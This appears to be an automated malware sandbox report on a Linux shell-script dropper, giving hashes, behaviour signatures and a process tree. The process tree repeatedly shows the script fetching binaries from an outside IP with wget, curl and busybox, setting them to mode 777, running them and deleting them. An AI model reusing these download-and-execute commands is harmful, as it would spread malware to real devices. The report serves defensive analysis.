Analysis
-
max time kernel
150s -
max time network
154s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
28/10/2024, 02:11
Static task
static1
Behavioral task
behavioral1
Sample
1897ecadd0de224bc96967fc98ac118076ea7a4d083e06a94dec9ead30a9551a.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
1897ecadd0de224bc96967fc98ac118076ea7a4d083e06a94dec9ead30a9551a.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
1897ecadd0de224bc96967fc98ac118076ea7a4d083e06a94dec9ead30a9551a.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
1897ecadd0de224bc96967fc98ac118076ea7a4d083e06a94dec9ead30a9551a.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
1897ecadd0de224bc96967fc98ac118076ea7a4d083e06a94dec9ead30a9551a.sh
-
Size
10KB
-
MD5
494b961d2cc6cd624a738d892314cce5
-
SHA1
2052b079fe79da190c6459c627a8c44003ae1f58
-
SHA256
1897ecadd0de224bc96967fc98ac118076ea7a4d083e06a94dec9ead30a9551a
-
SHA512
801d76a32d0790a02cd3d7cd93041c371e44ee9240e240edbb3ecc9fe52c8c26b5395847509398bfa4a17c7a0064475421114120a7b5a49d167b5015a0149e50
-
SSDEEP
96:0rD7ICJJSVBxqV9VlVAVhVlVAzyqz6JbvQXgQLYE1sw/yqz8zJJSVBhk7V9VlVAQ:6eqXrifnmzheJqSXrifn0f
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 27 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 892 chmod 904 chmod 916 chmod 874 chmod 880 chmod 748 chmod 910 chmod 946 chmod 734 chmod 898 chmod 928 chmod 952 chmod 940 chmod 826 chmod 922 chmod 958 chmod 787 chmod 860 chmod 742 chmod 814 chmod 934 chmod 964 chmod 970 chmod 757 chmod 820 chmod 840 chmod 886 chmod -
Executes dropped EXE 27 IoCs
ioc pid Process /tmp/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP 735 hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP /tmp/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO 743 YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO /tmp/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo 749 GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo /tmp/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r 758 TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r /tmp/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh 789 BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh /tmp/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2 815 8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2 /tmp/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu 821 ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu /tmp/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo 827 TtiH17uSRwU8OtuZzPC189hS1401xDLvpo /tmp/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O 841 nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O /tmp/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo 862 78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo /tmp/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh 875 nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh /tmp/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD5 881 nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD5 /tmp/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq 887 JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq /tmp/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H 893 T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H /tmp/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2 899 8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2 /tmp/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu 905 ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu /tmp/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo 911 TtiH17uSRwU8OtuZzPC189hS1401xDLvpo /tmp/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O 917 nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O /tmp/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo 923 GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo /tmp/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r 929 TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r /tmp/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh 935 BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh /tmp/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo 941 78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo /tmp/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh 947 nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh /tmp/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD5 953 nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD5 /tmp/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq 959 JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq /tmp/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H 965 T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H /tmp/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP 971 hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 27 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo curl File opened for modification /tmp/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r curl File opened for modification /tmp/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh curl File opened for modification /tmp/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh curl File opened for modification /tmp/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP curl File opened for modification /tmp/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r curl File opened for modification /tmp/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo curl File opened for modification /tmp/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O curl File opened for modification /tmp/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD5 curl File opened for modification /tmp/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP curl File opened for modification /tmp/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO curl File opened for modification /tmp/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo curl File opened for modification /tmp/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq curl File opened for modification /tmp/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq curl File opened for modification /tmp/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo curl File opened for modification /tmp/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H curl File opened for modification /tmp/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo curl File opened for modification /tmp/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh curl File opened for modification /tmp/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H curl File opened for modification /tmp/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2 curl File opened for modification /tmp/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu curl File opened for modification /tmp/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu curl File opened for modification /tmp/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD5 curl File opened for modification /tmp/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo curl File opened for modification /tmp/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh curl File opened for modification /tmp/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2 curl File opened for modification /tmp/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O curl
Processes
-
/tmp/1897ecadd0de224bc96967fc98ac118076ea7a4d083e06a94dec9ead30a9551a.sh/tmp/1897ecadd0de224bc96967fc98ac118076ea7a4d083e06a94dec9ead30a9551a.sh1⤵PID:704
-
/bin/rm/bin/rm bins.sh2⤵PID:710
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵PID:713
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:719
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵PID:731
-
-
/bin/chmodchmod 777 hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP./hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- Executes dropped EXE
PID:735
-
-
/bin/rmrm hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵PID:737
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵PID:738
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:740
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵PID:741
-
-
/bin/chmodchmod 777 YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO./YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵
- Executes dropped EXE
PID:743
-
-
/bin/rmrm YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵PID:744
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵PID:745
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:746
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵PID:747
-
-
/bin/chmodchmod 777 GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo./GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵PID:750
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵PID:751
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:752
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵PID:756
-
-
/bin/chmodchmod 777 TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- File and Directory Permissions Modification
PID:757
-
-
/tmp/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r./TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- Executes dropped EXE
PID:758
-
-
/bin/rmrm TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵PID:759
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵PID:760
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:765
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵PID:773
-
-
/bin/chmodchmod 777 BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- File and Directory Permissions Modification
PID:787
-
-
/tmp/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh./BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- Executes dropped EXE
PID:789
-
-
/bin/rmrm BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵PID:792
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵PID:793
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:799
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵PID:810
-
-
/bin/chmodchmod 777 8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- File and Directory Permissions Modification
PID:814
-
-
/tmp/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2./8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- Executes dropped EXE
PID:815
-
-
/bin/rmrm 8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵PID:816
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵PID:817
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:818
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵PID:819
-
-
/bin/chmodchmod 777 ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu./ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵PID:822
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵PID:823
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:824
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵PID:825
-
-
/bin/chmodchmod 777 TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- File and Directory Permissions Modification
PID:826
-
-
/tmp/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo./TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- Executes dropped EXE
PID:827
-
-
/bin/rmrm TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵PID:828
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵PID:829
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:830
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵PID:837
-
-
/bin/chmodchmod 777 nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- File and Directory Permissions Modification
PID:840
-
-
/tmp/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O./nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- Executes dropped EXE
PID:841
-
-
/bin/rmrm nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵PID:844
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵PID:846
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:850
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵PID:858
-
-
/bin/chmodchmod 777 78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo./78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm 78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵PID:866
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵PID:867
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:872
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵PID:873
-
-
/bin/chmodchmod 777 nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh./nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵PID:876
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵PID:877
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵PID:879
-
-
/bin/chmodchmod 777 nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD5./nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵PID:882
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵PID:883
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵PID:885
-
-
/bin/chmodchmod 777 JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq./JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵PID:888
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵PID:889
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵PID:891
-
-
/bin/chmodchmod 777 T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H./T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵PID:894
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵PID:895
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵PID:897
-
-
/bin/chmodchmod 777 8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2./8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm 8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵PID:900
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵PID:901
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵PID:903
-
-
/bin/chmodchmod 777 ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu./ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵PID:906
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵PID:907
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵PID:909
-
-
/bin/chmodchmod 777 TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo./TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵PID:912
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵PID:913
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵PID:915
-
-
/bin/chmodchmod 777 nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O./nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵PID:918
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵PID:919
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵PID:921
-
-
/bin/chmodchmod 777 GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo./GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵PID:924
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵PID:925
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵PID:927
-
-
/bin/chmodchmod 777 TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- File and Directory Permissions Modification
PID:928
-
-
/tmp/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r./TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- Executes dropped EXE
PID:929
-
-
/bin/rmrm TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵PID:930
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵PID:931
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:932
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵PID:933
-
-
/bin/chmodchmod 777 BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh./BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵PID:936
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵PID:937
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵
